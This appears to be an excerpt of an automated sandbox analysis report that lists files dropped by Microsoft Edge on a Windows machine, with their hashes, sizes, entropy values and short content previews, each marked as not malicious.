                                                        Preview:{"abusive_adblocker_etag":"\"9E0A5915E51EE1E95D843B1CDAB336B8361C98398784A73FC6A8A28F910D2E75\"","desktop_mode":{"clear_prefs_once_applied":true,"is_on":false,"is_on_by_default_applied":true,"is_search_only_on_by_default_applied":true},"domain_actions_config":"H4sIAAAAAAAAAL19a4/cNpboXzH60+4gRbvbrzj7aTbj2Ql2MhlkswhwF4MGRVISWxQp81FVqkH++z2HUrXbLkndh51dBHba1XX4PDzvxz+v+P76VjipxG2teExe3YpWie7W7ZX3Wqqr7/55xYfBaMGjdjZcffc/8wdK3g4OPh+vvrv6aYg/pXj1zZV0PdcWPrEq1kYfmXD91W/fUEBCTFK7MEH+45urDKHVNLPlvXoIHMcB//3H/fX3uIk/T3v4HrcwfweHgL0EWPzVd9e/fXMlZE/dnTXjx+Pggvq74ePPisvx4bqD0bbZ2Og99K8w415b9RA4usTivgSy50f4WTHYRQE0r0TxkvcMIVQpvOHvmY4lkMdaWx3H0okPPIoWVi/cFl5uDqEbWICCMbxrAKlKh6lMUiL5PY4UWn5ggpcM0yp8Ynv4jYve2dLVCA978oD/ouXWKlM6jo08toiSpffjDoNXQdkYBpOKD3ffHgufVJtMKp0Vvs4+JS06uJShdJA/6dD+0Y6HVnm1TQAXSdJMDfEjnz/CJVxAPJh4Brj/5JJYZtZAI5d/gW/+WP9F7UWmyTTSsQFstY3KSrd5MJfw8x4ffriwzR5P5lZboOXq2cwPcaHxvO+5N1vU6gKw18K74OqIVMGrwcGWi+B3/fhgiJ2sSYzY4W5ZcE8FcFZJr/eKGfyLMJOray0KIOCL4cFk21LCwm0jIsXbWhuge7fO3sKot+GggT0

                                                        C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Local State~RF31aec.TMP (copy)

                                                        Download File
                                                        Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                        File Type:JSON data
                                                        Category:dropped
                                                        Size (bytes):0
                                                        Entropy (8bit):0.0
                                                        Encrypted:false
                                                        SSDEEP:
                                                        MD5:7321CC75A7C96F53148F42704EBA627E
                                                        SHA1:497C0E503C7CCA42F2FCBB4E9EB38996429387AF
                                                        SHA-256:D1E700AE8E09A9D0054D20A4A80149D47E7E8935A756C5145AB0A5A05FC7196D
                                                        SHA-512:452D6C03AA8A982FFB658A2357990875A302CC978E7DFBA894B02CACE77CDFABB495DE20F451623B4E5C91A29BB1A184CEB17853CDB3CDE840D7C5B91635527B
                                                        Malicious:false
                                                        Reputation:unknown
                                                        Preview:{"abusive_adblocker_etag":"\"9E0A5915E51EE1E95D843B1CDAB336B8361C98398784A73FC6A8A28F910D2E75\"","desktop_mode":{"clear_prefs_once_applied":true,"is_on":false,"is_on_by_default_applied":true,"is_search_only_on_by_default_applied":true},"domain_actions_config":"H4sIAAAAAAAAAL19a4/cNpboXzH60+4gRbvbrzj7aTbj2Ql2MhlkswhwF4MGRVISWxQp81FVqkH++z2HUrXbLkndh51dBHba1XX4PDzvxz+v+P76VjipxG2teExe3YpWie7W7ZX3Wqqr7/55xYfBaMGjdjZcffc/8wdK3g4OPh+vvrv6aYg/pXj1zZV0PdcWPrEq1kYfmXD91W/fUEBCTFK7MEH+45urDKHVNLPlvXoIHMcB//3H/fX3uIk/T3v4HrcwfweHgL0EWPzVd9e/fXMlZE/dnTXjx+Pggvq74ePPisvx4bqD0bbZ2Og99K8w415b9RA4usTivgSy50f4WTHYRQE0r0TxkvcMIVQpvOHvmY4lkMdaWx3H0okPPIoWVi/cFl5uDqEbWICCMbxrAKlKh6lMUiL5PY4UWn5ggpcM0yp8Ynv4jYve2dLVCA978oD/ouXWKlM6jo08toiSpffjDoNXQdkYBpOKD3ffHgufVJtMKp0Vvs4+JS06uJShdJA/6dD+0Y6HVnm1TQAXSdJMDfEjnz/CJVxAPJh4Brj/5JJYZtZAI5d/gW/+WP9F7UWmyTTSsQFstY3KSrd5MJfw8x4ffriwzR5P5lZboOXq2cwPcaHxvO+5N1vU6gKw18K74OqIVMGrwcGWi+B3/fhgiJ2sSYzY4W5ZcE8FcFZJr/eKGfyLMJOray0KIOCL4cFk21LCwm0jIsXbWhuge7fO3sKot+GggT0

                                                        C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Local State~RF31c24.TMP (copy)

                                                        Download File
                                                        Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                        File Type:JSON data
                                                        Category:dropped
                                                        Size (bytes):0
                                                        Entropy (8bit):0.0
                                                        Encrypted:false
                                                        SSDEEP:
                                                        MD5:7321CC75A7C96F53148F42704EBA627E
                                                        SHA1:497C0E503C7CCA42F2FCBB4E9EB38996429387AF
                                                        SHA-256:D1E700AE8E09A9D0054D20A4A80149D47E7E8935A756C5145AB0A5A05FC7196D
                                                        SHA-512:452D6C03AA8A982FFB658A2357990875A302CC978E7DFBA894B02CACE77CDFABB495DE20F451623B4E5C91A29BB1A184CEB17853CDB3CDE840D7C5B91635527B
                                                        Malicious:false
                                                        Reputation:unknown
                                                        Preview:{"abusive_adblocker_etag":"\"9E0A5915E51EE1E95D843B1CDAB336B8361C98398784A73FC6A8A28F910D2E75\"","desktop_mode":{"clear_prefs_once_applied":true,"is_on":false,"is_on_by_default_applied":true,"is_search_only_on_by_default_applied":true},"domain_actions_config":"H4sIAAAAAAAAAL19a4/cNpboXzH60+4gRbvbrzj7aTbj2Ql2MhlkswhwF4MGRVISWxQp81FVqkH++z2HUrXbLkndh51dBHba1XX4PDzvxz+v+P76VjipxG2teExe3YpWie7W7ZX3Wqqr7/55xYfBaMGjdjZcffc/8wdK3g4OPh+vvrv6aYg/pXj1zZV0PdcWPrEq1kYfmXD91W/fUEBCTFK7MEH+45urDKHVNLPlvXoIHMcB//3H/fX3uIk/T3v4HrcwfweHgL0EWPzVd9e/fXMlZE/dnTXjx+Pggvq74ePPisvx4bqD0bbZ2Og99K8w415b9RA4usTivgSy50f4WTHYRQE0r0TxkvcMIVQpvOHvmY4lkMdaWx3H0okPPIoWVi/cFl5uDqEbWICCMbxrAKlKh6lMUiL5PY4UWn5ggpcM0yp8Ynv4jYve2dLVCA978oD/ouXWKlM6jo08toiSpffjDoNXQdkYBpOKD3ffHgufVJtMKp0Vvs4+JS06uJShdJA/6dD+0Y6HVnm1TQAXSdJMDfEjnz/CJVxAPJh4Brj/5JJYZtZAI5d/gW/+WP9F7UWmyTTSsQFstY3KSrd5MJfw8x4ffriwzR5P5lZboOXq2cwPcaHxvO+5N1vU6gKw18K74OqIVMGrwcGWi+B3/fhgiJ2sSYzY4W5ZcE8FcFZJr/eKGfyLMJOray0KIOCL4cFk21LCwm0jIsXbWhuge7fO3sKot+GggT0

                                                        C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Local State~RF334ec.TMP (copy)

                                                        Download File
                                                        Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                        File Type:JSON data
                                                        Category:dropped
                                                        Size (bytes):0
                                                        Entropy (8bit):0.0
                                                        Encrypted:false
                                                        SSDEEP:
                                                        MD5:7321CC75A7C96F53148F42704EBA627E
                                                        SHA1:497C0E503C7CCA42F2FCBB4E9EB38996429387AF
                                                        SHA-256:D1E700AE8E09A9D0054D20A4A80149D47E7E8935A756C5145AB0A5A05FC7196D
                                                        SHA-512:452D6C03AA8A982FFB658A2357990875A302CC978E7DFBA894B02CACE77CDFABB495DE20F451623B4E5C91A29BB1A184CEB17853CDB3CDE840D7C5B91635527B
                                                        Malicious:false
                                                        Reputation:unknown
                                                        Preview:{"abusive_adblocker_etag":"\"9E0A5915E51EE1E95D843B1CDAB336B8361C98398784A73FC6A8A28F910D2E75\"","desktop_mode":{"clear_prefs_once_applied":true,"is_on":false,"is_on_by_default_applied":true,"is_search_only_on_by_default_applied":true},"domain_actions_config":"H4sIAAAAAAAAAL19a4/cNpboXzH60+4gRbvbrzj7aTbj2Ql2MhlkswhwF4MGRVISWxQp81FVqkH++z2HUrXbLkndh51dBHba1XX4PDzvxz+v+P76VjipxG2teExe3YpWie7W7ZX3Wqqr7/55xYfBaMGjdjZcffc/8wdK3g4OPh+vvrv6aYg/pXj1zZV0PdcWPrEq1kYfmXD91W/fUEBCTFK7MEH+45urDKHVNLPlvXoIHMcB//3H/fX3uIk/T3v4HrcwfweHgL0EWPzVd9e/fXMlZE/dnTXjx+Pggvq74ePPisvx4bqD0bbZ2Og99K8w415b9RA4usTivgSy50f4WTHYRQE0r0TxkvcMIVQpvOHvmY4lkMdaWx3H0okPPIoWVi/cFl5uDqEbWICCMbxrAKlKh6lMUiL5PY4UWn5ggpcM0yp8Ynv4jYve2dLVCA978oD/ouXWKlM6jo08toiSpffjDoNXQdkYBpOKD3ffHgufVJtMKp0Vvs4+JS06uJShdJA/6dD+0Y6HVnm1TQAXSdJMDfEjnz/CJVxAPJh4Brj/5JJYZtZAI5d/gW/+WP9F7UWmyTTSsQFstY3KSrd5MJfw8x4ffriwzR5P5lZboOXq2cwPcaHxvO+5N1vU6gKw18K74OqIVMGrwcGWi+B3/fhgiJ2sSYzY4W5ZcE8FcFZJr/eKGfyLMJOray0KIOCL4cFk21LCwm0jIsXbWhuge7fO3sKot+GggT0

                                                        C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Local State~RF334fb.TMP (copy)

                                                        Download File
                                                        Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                        File Type:JSON data
                                                        Category:dropped
                                                        Size (bytes):0
                                                        Entropy (8bit):0.0
                                                        Encrypted:false
                                                        SSDEEP:
                                                        MD5:7321CC75A7C96F53148F42704EBA627E
                                                        SHA1:497C0E503C7CCA42F2FCBB4E9EB38996429387AF
                                                        SHA-256:D1E700AE8E09A9D0054D20A4A80149D47E7E8935A756C5145AB0A5A05FC7196D
                                                        SHA-512:452D6C03AA8A982FFB658A2357990875A302CC978E7DFBA894B02CACE77CDFABB495DE20F451623B4E5C91A29BB1A184CEB17853CDB3CDE840D7C5B91635527B
                                                        Malicious:false
                                                        Reputation:unknown
                                                        Preview:{"abusive_adblocker_etag":"\"9E0A5915E51EE1E95D843B1CDAB336B8361C98398784A73FC6A8A28F910D2E75\"","desktop_mode":{"clear_prefs_once_applied":true,"is_on":false,"is_on_by_default_applied":true,"is_search_only_on_by_default_applied":true},"domain_actions_config":"H4sIAAAAAAAAAL19a4/cNpboXzH60+4gRbvbrzj7aTbj2Ql2MhlkswhwF4MGRVISWxQp81FVqkH++z2HUrXbLkndh51dBHba1XX4PDzvxz+v+P76VjipxG2teExe3YpWie7W7ZX3Wqqr7/55xYfBaMGjdjZcffc/8wdK3g4OPh+vvrv6aYg/pXj1zZV0PdcWPrEq1kYfmXD91W/fUEBCTFK7MEH+45urDKHVNLPlvXoIHMcB//3H/fX3uIk/T3v4HrcwfweHgL0EWPzVd9e/fXMlZE/dnTXjx+Pggvq74ePPisvx4bqD0bbZ2Og99K8w415b9RA4usTivgSy50f4WTHYRQE0r0TxkvcMIVQpvOHvmY4lkMdaWx3H0okPPIoWVi/cFl5uDqEbWICCMbxrAKlKh6lMUiL5PY4UWn5ggpcM0yp8Ynv4jYve2dLVCA978oD/ouXWKlM6jo08toiSpffjDoNXQdkYBpOKD3ffHgufVJtMKp0Vvs4+JS06uJShdJA/6dD+0Y6HVnm1TQAXSdJMDfEjnz/CJVxAPJh4Brj/5JJYZtZAI5d/gW/+WP9F7UWmyTTSsQFstY3KSrd5MJfw8x4ffriwzR5P5lZboOXq2cwPcaHxvO+5N1vU6gKw18K74OqIVMGrwcGWi+B3/fhgiJ2sSYzY4W5ZcE8FcFZJr/eKGfyLMJOray0KIOCL4cFk21LCwm0jIsXbWhuge7fO3sKot+GggT0

                                                        C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Local State~RF3354a.TMP (copy)

                                                        Download File
                                                        Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                        File Type:JSON data
                                                        Category:dropped
                                                        Size (bytes):0
                                                        Entropy (8bit):0.0
                                                        Encrypted:false
                                                        SSDEEP:
                                                        MD5:7321CC75A7C96F53148F42704EBA627E
                                                        SHA1:497C0E503C7CCA42F2FCBB4E9EB38996429387AF
                                                        SHA-256:D1E700AE8E09A9D0054D20A4A80149D47E7E8935A756C5145AB0A5A05FC7196D
                                                        SHA-512:452D6C03AA8A982FFB658A2357990875A302CC978E7DFBA894B02CACE77CDFABB495DE20F451623B4E5C91A29BB1A184CEB17853CDB3CDE840D7C5B91635527B
                                                        Malicious:false
                                                        Reputation:unknown
                                                        Preview:{"abusive_adblocker_etag":"\"9E0A5915E51EE1E95D843B1CDAB336B8361C98398784A73FC6A8A28F910D2E75\"","desktop_mode":{"clear_prefs_once_applied":true,"is_on":false,"is_on_by_default_applied":true,"is_search_only_on_by_default_applied":true},"domain_actions_config":"H4sIAAAAAAAAAL19a4/cNpboXzH60+4gRbvbrzj7aTbj2Ql2MhlkswhwF4MGRVISWxQp81FVqkH++z2HUrXbLkndh51dBHba1XX4PDzvxz+v+P76VjipxG2teExe3YpWie7W7ZX3Wqqr7/55xYfBaMGjdjZcffc/8wdK3g4OPh+vvrv6aYg/pXj1zZV0PdcWPrEq1kYfmXD91W/fUEBCTFK7MEH+45urDKHVNLPlvXoIHMcB//3H/fX3uIk/T3v4HrcwfweHgL0EWPzVd9e/fXMlZE/dnTXjx+Pggvq74ePPisvx4bqD0bbZ2Og99K8w415b9RA4usTivgSy50f4WTHYRQE0r0TxkvcMIVQpvOHvmY4lkMdaWx3H0okPPIoWVi/cFl5uDqEbWICCMbxrAKlKh6lMUiL5PY4UWn5ggpcM0yp8Ynv4jYve2dLVCA978oD/ouXWKlM6jo08toiSpffjDoNXQdkYBpOKD3ffHgufVJtMKp0Vvs4+JS06uJShdJA/6dD+0Y6HVnm1TQAXSdJMDfEjnz/CJVxAPJh4Brj/5JJYZtZAI5d/gW/+WP9F7UWmyTTSsQFstY3KSrd5MJfw8x4ffriwzR5P5lZboOXq2cwPcaHxvO+5N1vU6gKw18K74OqIVMGrwcGWi+B3/fhgiJ2sSYzY4W5ZcE8FcFZJr/eKGfyLMJOray0KIOCL4cFk21LCwm0jIsXbWhuge7fO3sKot+GggT0

                                                        C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Local State~RF33569.TMP (copy)

                                                        Download File
                                                        Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                        File Type:JSON data
                                                        Category:dropped
                                                        Size (bytes):0
                                                        Entropy (8bit):0.0
                                                        Encrypted:false
                                                        SSDEEP:
                                                        MD5:7321CC75A7C96F53148F42704EBA627E
                                                        SHA1:497C0E503C7CCA42F2FCBB4E9EB38996429387AF
                                                        SHA-256:D1E700AE8E09A9D0054D20A4A80149D47E7E8935A756C5145AB0A5A05FC7196D
                                                        SHA-512:452D6C03AA8A982FFB658A2357990875A302CC978E7DFBA894B02CACE77CDFABB495DE20F451623B4E5C91A29BB1A184CEB17853CDB3CDE840D7C5B91635527B
                                                        Malicious:false
                                                        Reputation:unknown
                                                        Preview:{"abusive_adblocker_etag":"\"9E0A5915E51EE1E95D843B1CDAB336B8361C98398784A73FC6A8A28F910D2E75\"","desktop_mode":{"clear_prefs_once_applied":true,"is_on":false,"is_on_by_default_applied":true,"is_search_only_on_by_default_applied":true},"domain_actions_config":"H4sIAAAAAAAAAL19a4/cNpboXzH60+4gRbvbrzj7aTbj2Ql2MhlkswhwF4MGRVISWxQp81FVqkH++z2HUrXbLkndh51dBHba1XX4PDzvxz+v+P76VjipxG2teExe3YpWie7W7ZX3Wqqr7/55xYfBaMGjdjZcffc/8wdK3g4OPh+vvrv6aYg/pXj1zZV0PdcWPrEq1kYfmXD91W/fUEBCTFK7MEH+45urDKHVNLPlvXoIHMcB//3H/fX3uIk/T3v4HrcwfweHgL0EWPzVd9e/fXMlZE/dnTXjx+Pggvq74ePPisvx4bqD0bbZ2Og99K8w415b9RA4usTivgSy50f4WTHYRQE0r0TxkvcMIVQpvOHvmY4lkMdaWx3H0okPPIoWVi/cFl5uDqEbWICCMbxrAKlKh6lMUiL5PY4UWn5ggpcM0yp8Ynv4jYve2dLVCA978oD/ouXWKlM6jo08toiSpffjDoNXQdkYBpOKD3ffHgufVJtMKp0Vvs4+JS06uJShdJA/6dD+0Y6HVnm1TQAXSdJMDfEjnz/CJVxAPJh4Brj/5JJYZtZAI5d/gW/+WP9F7UWmyTTSsQFstY3KSrd5MJfw8x4ffriwzR5P5lZboOXq2cwPcaHxvO+5N1vU6gKw18K74OqIVMGrwcGWi+B3/fhgiJ2sSYzY4W5ZcE8FcFZJr/eKGfyLMJOray0KIOCL4cFk21LCwm0jIsXbWhuge7fO3sKot+GggT0

                                                        C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Local State~RF35c4a.TMP (copy)

                                                        Download File
                                                        Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                        File Type:JSON data
                                                        Category:dropped
                                                        Size (bytes):0
                                                        Entropy (8bit):0.0
                                                        Encrypted:false
                                                        SSDEEP:
                                                        MD5:7321CC75A7C96F53148F42704EBA627E
                                                        SHA1:497C0E503C7CCA42F2FCBB4E9EB38996429387AF
                                                        SHA-256:D1E700AE8E09A9D0054D20A4A80149D47E7E8935A756C5145AB0A5A05FC7196D
                                                        SHA-512:452D6C03AA8A982FFB658A2357990875A302CC978E7DFBA894B02CACE77CDFABB495DE20F451623B4E5C91A29BB1A184CEB17853CDB3CDE840D7C5B91635527B
                                                        Malicious:false
                                                        Reputation:unknown
                                                        Preview:{"abusive_adblocker_etag":"\"9E0A5915E51EE1E95D843B1CDAB336B8361C98398784A73FC6A8A28F910D2E75\"","desktop_mode":{"clear_prefs_once_applied":true,"is_on":false,"is_on_by_default_applied":true,"is_search_only_on_by_default_applied":true},"domain_actions_config":"H4sIAAAAAAAAAL19a4/cNpboXzH60+4gRbvbrzj7aTbj2Ql2MhlkswhwF4MGRVISWxQp81FVqkH++z2HUrXbLkndh51dBHba1XX4PDzvxz+v+P76VjipxG2teExe3YpWie7W7ZX3Wqqr7/55xYfBaMGjdjZcffc/8wdK3g4OPh+vvrv6aYg/pXj1zZV0PdcWPrEq1kYfmXD91W/fUEBCTFK7MEH+45urDKHVNLPlvXoIHMcB//3H/fX3uIk/T3v4HrcwfweHgL0EWPzVd9e/fXMlZE/dnTXjx+Pggvq74ePPisvx4bqD0bbZ2Og99K8w415b9RA4usTivgSy50f4WTHYRQE0r0TxkvcMIVQpvOHvmY4lkMdaWx3H0okPPIoWVi/cFl5uDqEbWICCMbxrAKlKh6lMUiL5PY4UWn5ggpcM0yp8Ynv4jYve2dLVCA978oD/ouXWKlM6jo08toiSpffjDoNXQdkYBpOKD3ffHgufVJtMKp0Vvs4+JS06uJShdJA/6dD+0Y6HVnm1TQAXSdJMDfEjnz/CJVxAPJh4Brj/5JJYZtZAI5d/gW/+WP9F7UWmyTTSsQFstY3KSrd5MJfw8x4ffriwzR5P5lZboOXq2cwPcaHxvO+5N1vU6gKw18K74OqIVMGrwcGWi+B3/fhgiJ2sSYzY4W5ZcE8FcFZJr/eKGfyLMJOray0KIOCL4cFk21LCwm0jIsXbWhuge7fO3sKot+GggT0

                                                        C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Variations

                                                        Download File
                                                        Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                        File Type:JSON data
                                                        Category:dropped
                                                        Size (bytes):86
                                                        Entropy (8bit):4.3751917412896075
                                                        Encrypted:false
                                                        SSDEEP:
                                                        MD5:F732DBED9289177D15E236D0F8F2DDD3
                                                        SHA1:53F822AF51B014BC3D4B575865D9C3EF0E4DEBDE
                                                        SHA-256:2741DF9EE9E9D9883397078F94480E9BC1D9C76996EEC5CFE4E77929337CBE93
                                                        SHA-512:B64E5021F32E26C752FCBA15A139815894309B25644E74CECA46A9AA97070BCA3B77DED569A9BFD694193D035BA75B61A8D6262C8E6D5C4D76B452B38F5150A4
                                                        Malicious:false
                                                        Reputation:unknown
                                                        Preview:{"user_experience_metrics.stability.exited_cleanly":false,"variations_crash_streak":1}

                                                        C:\Users\user\AppData\Local\Microsoft\TokenBroker\Cache\5a2a7058cf8d1e56c20e6b19a7c48eb2386d141b.tbres

                                                        Download File
                                                        Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                        File Type:data
                                                        Category:dropped
                                                        Size (bytes):2278
                                                        Entropy (8bit):3.8457103174835896
                                                        Encrypted:false
                                                        SSDEEP:
                                                        MD5:FB9EB918FA000A44699735702A1B9D05
                                                        SHA1:4B766F28FBA366C60B7E9983C92AED7674D3E2CC
                                                        SHA-256:16BA4E722CC55061B080E81A0BF089845743DDC2F0DAEB6F26048484B3238E23
                                                        SHA-512:10A1C4CC4C9EA060D1B7C47AC5B557A212F8B1607231DDF40F29015161A1C03988D3EC58F55D4C27B88DB92A2468720B80DD3BF70743190092217BEE59C5FB84
                                                        Malicious:false
                                                        Reputation:unknown
                                                        Preview:{.".T.B.D.a.t.a.S.t.o.r.e.O.b.j.e.c.t.".:.{.".H.e.a.d.e.r.".:.{.".O.b.j.e.c.t.T.y.p.e.".:.".T.o.k.e.n.R.e.s.p.o.n.s.e.".,.".S.c.h.e.m.a.V.e.r.s.i.o.n.M.a.j.o.r.".:.2.,.".S.c.h.e.m.a.V.e.r.s.i.o.n.M.i.n.o.r.".:.1.}.,.".O.b.j.e.c.t.D.a.t.a.".:.{.".S.y.s.t.e.m.D.e.f.i.n.e.d.P.r.o.p.e.r.t.i.e.s.".:.{.".R.e.q.u.e.s.t.I.n.d.e.x.".:.{.".T.y.p.e.".:.".I.n.l.i.n.e.B.y.t.e.s.".,.".I.s.P.r.o.t.e.c.t.e.d.".:.f.a.l.s.e.,.".V.a.l.u.e.".:.".W.i.p.w.W.M.+.N.H.l.b.C.D.m.s.Z.p.8.S.O.s.j.h.t.F.B.s.=.".}.,.".E.x.p.i.r.a.t.i.o.n.".:.{.".T.y.p.e.".:.".I.n.l.i.n.e.B.y.t.e.s.".,.".I.s.P.r.o.t.e.c.t.e.d.".:.f.a.l.s.e.,.".V.a.l.u.e.".:.".A.K.d.u.3.o.U.r.2.w.E.=.".}.,.".S.t.a.t.u.s.".:.{.".T.y.p.e.".:.".I.n.l.i.n.e.B.y.t.e.s.".,.".I.s.P.r.o.t.e.c.t.e.d.".:.f.a.l.s.e.,.".V.a.l.u.e.".:.".A.A.A.A.A.A.=.=.".}.,.".R.e.s.p.o.n.s.e.B.y.t.e.s.".:.{.".T.y.p.e.".:.".I.n.l.i.n.e.B.y.t.e.s.".,.".I.s.P.r.o.t.e.c.t.e.d.".:.t.r.u.e.,.".V.a.l.u.e.".:.".A.Q.A.A.A.N.C.M.n.d.8.B.F.d.E.R.j.H.o.A.w.E./.C.l.+.s.B.A.A.A.A.H.H.I.I.M.6.

                                                        C:\Users\user\AppData\Local\Microsoft\TokenBroker\Cache\cf7513a936f7effbb38627e56f8d1fce10eb12cc.tbres

                                                        Download File
                                                        Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                        File Type:data
                                                        Category:dropped
                                                        Size (bytes):4622
                                                        Entropy (8bit):3.9926614941923813
                                                        Encrypted:false
                                                        SSDEEP:
                                                        MD5:1575D53F01A80009B4A5321A199BAC90
                                                        SHA1:822AEFAEDB4CFED072A7FB4C304EFFEB800EF394
                                                        SHA-256:6F15775837914C06E388A1C1CCA6716505906BDAB785194B292A26559856CD5F
                                                        SHA-512:BA0E30FE232EB59B16B5BF8EC62BD1DE1DB71C500F254FE5E37E31180509EF469E33A4F0DC091D6AD5F13911AA1537120CF422958821E9A4894D874A1FFE8A55
                                                        Malicious:false
                                                        Reputation:unknown
                                                        Preview:{.".T.B.D.a.t.a.S.t.o.r.e.O.b.j.e.c.t.".:.{.".H.e.a.d.e.r.".:.{.".O.b.j.e.c.t.T.y.p.e.".:.".T.o.k.e.n.R.e.s.p.o.n.s.e.".,.".S.c.h.e.m.a.V.e.r.s.i.o.n.M.a.j.o.r.".:.2.,.".S.c.h.e.m.a.V.e.r.s.i.o.n.M.i.n.o.r.".:.1.}.,.".O.b.j.e.c.t.D.a.t.a.".:.{.".S.y.s.t.e.m.D.e.f.i.n.e.d.P.r.o.p.e.r.t.i.e.s.".:.{.".R.e.q.u.e.s.t.I.n.d.e.x.".:.{.".T.y.p.e.".:.".I.n.l.i.n.e.B.y.t.e.s.".,.".I.s.P.r.o.t.e.c.t.e.d.".:.f.a.l.s.e.,.".V.a.l.u.e.".:.".z.3.U.T.q.T.b.3.7./.u.z.h.i.f.l.b.4.0.f.z.h.D.r.E.s.w.=.".}.,.".E.x.p.i.r.a.t.i.o.n.".:.{.".T.y.p.e.".:.".I.n.l.i.n.e.B.y.t.e.s.".,.".I.s.P.r.o.t.e.c.t.e.d.".:.f.a.l.s.e.,.".V.a.l.u.e.".:.".h.R.h.K.x.H.0.r.2.w.E.=.".}.,.".S.t.a.t.u.s.".:.{.".T.y.p.e.".:.".I.n.l.i.n.e.B.y.t.e.s.".,.".I.s.P.r.o.t.e.c.t.e.d.".:.f.a.l.s.e.,.".V.a.l.u.e.".:.".A.w.A.A.A.A.=.=.".}.,.".R.e.s.p.o.n.s.e.B.y.t.e.s.".:.{.".T.y.p.e.".:.".I.n.l.i.n.e.B.y.t.e.s.".,.".I.s.P.r.o.t.e.c.t.e.d.".:.t.r.u.e.,.".V.a.l.u.e.".:.".A.Q.A.A.A.N.C.M.n.d.8.B.F.d.E.R.j.H.o.A.w.E./.C.l.+.s.B.A.A.A.A.H.H.I.I.M.6.

                                                        C:\Users\user\AppData\Local\Microsoft\TokenBroker\Cache\e8ddd4cbd9c0504aace6ef7a13fa20d04fd52408.tbres

                                                        Download File
                                                        Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                        File Type:data
                                                        Category:dropped
                                                        Size (bytes):2684
                                                        Entropy (8bit):3.8983827538379856
                                                        Encrypted:false
                                                        SSDEEP:
                                                        MD5:8E9721C978A22039A9C8DA1F493D7722
                                                        SHA1:6C8E52766D9AC9BA92584FDD8B3B8DB02F475BE7
                                                        SHA-256:7E7FA5E40CCD8FFF4674B39090202BA04B79800E79ED5C911D5644FBCDB731E4
                                                        SHA-512:49C0977D44F8E54632EA8CB6644AF1F1E7DCDF3D028D4836951FB37603D775B1F6422213E66D98C7B521EB2A60292AF306FB3B8955D12863BF7448ED1B92829D
                                                        Malicious:false
                                                        Reputation:unknown
                                                        Preview:{.".T.B.D.a.t.a.S.t.o.r.e.O.b.j.e.c.t.".:.{.".H.e.a.d.e.r.".:.{.".O.b.j.e.c.t.T.y.p.e.".:.".T.o.k.e.n.R.e.s.p.o.n.s.e.".,.".S.c.h.e.m.a.V.e.r.s.i.o.n.M.a.j.o.r.".:.2.,.".S.c.h.e.m.a.V.e.r.s.i.o.n.M.i.n.o.r.".:.1.}.,.".O.b.j.e.c.t.D.a.t.a.".:.{.".S.y.s.t.e.m.D.e.f.i.n.e.d.P.r.o.p.e.r.t.i.e.s.".:.{.".R.e.q.u.e.s.t.I.n.d.e.x.".:.{.".T.y.p.e.".:.".I.n.l.i.n.e.B.y.t.e.s.".,.".I.s.P.r.o.t.e.c.t.e.d.".:.f.a.l.s.e.,.".V.a.l.u.e.".:.".6.N.3.U.y.9.n.A.U.E.q.s.5.u.9.6.E./.o.g.0.E./.V.J.A.g.=.".}.,.".E.x.p.i.r.a.t.i.o.n.".:.{.".T.y.p.e.".:.".I.n.l.i.n.e.B.y.t.e.s.".,.".I.s.P.r.o.t.e.c.t.e.d.".:.f.a.l.s.e.,.".V.a.l.u.e.".:.".j.1.3.g.9.E.5.K.3.A.E.=.".}.,.".S.t.a.t.u.s.".:.{.".T.y.p.e.".:.".I.n.l.i.n.e.B.y.t.e.s.".,.".I.s.P.r.o.t.e.c.t.e.d.".:.f.a.l.s.e.,.".V.a.l.u.e.".:.".A.A.A.A.A.A.=.=.".}.,.".R.e.s.p.o.n.s.e.B.y.t.e.s.".:.{.".T.y.p.e.".:.".I.n.l.i.n.e.B.y.t.e.s.".,.".I.s.P.r.o.t.e.c.t.e.d.".:.t.r.u.e.,.".V.a.l.u.e.".:.".A.Q.A.A.A.N.C.M.n.d.8.B.F.d.E.R.j.H.o.A.w.E./.C.l.+.s.B.A.A.A.A.H.H.I.I.M.6.

                                                        C:\Users\user\AppData\Local\Temp\57682ac4-ac08-4263-bfb0-d0b4ee462a35.tmp

                                                        Download File
                                                        Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                        File Type:Google Chrome extension, version 3
                                                        Category:dropped
                                                        Size (bytes):135771
                                                        Entropy (8bit):7.802585890890899
                                                        Encrypted:false
                                                        SSDEEP:
                                                        MD5:DA75BB05D10ACC967EECAAC040D3D733
                                                        SHA1:95C08E067DF713AF8992DB113F7E9AEC84F17181
                                                        SHA-256:33AE9B8F06DC777BB1A65A6BA6C3F2A01B25CD1AFC291426B46D1DF27EA6E7E2
                                                        SHA-512:56533DE53872F023809A20D1EA8532CDC2260D40B05C5A7012C8E61576FF092F006A197F759C92C6B8C429EEEC4BB542073B491DDCFD5B22CD4ECBE1A8A7C6EF
                                                        Malicious:false
                                                        Reputation:unknown
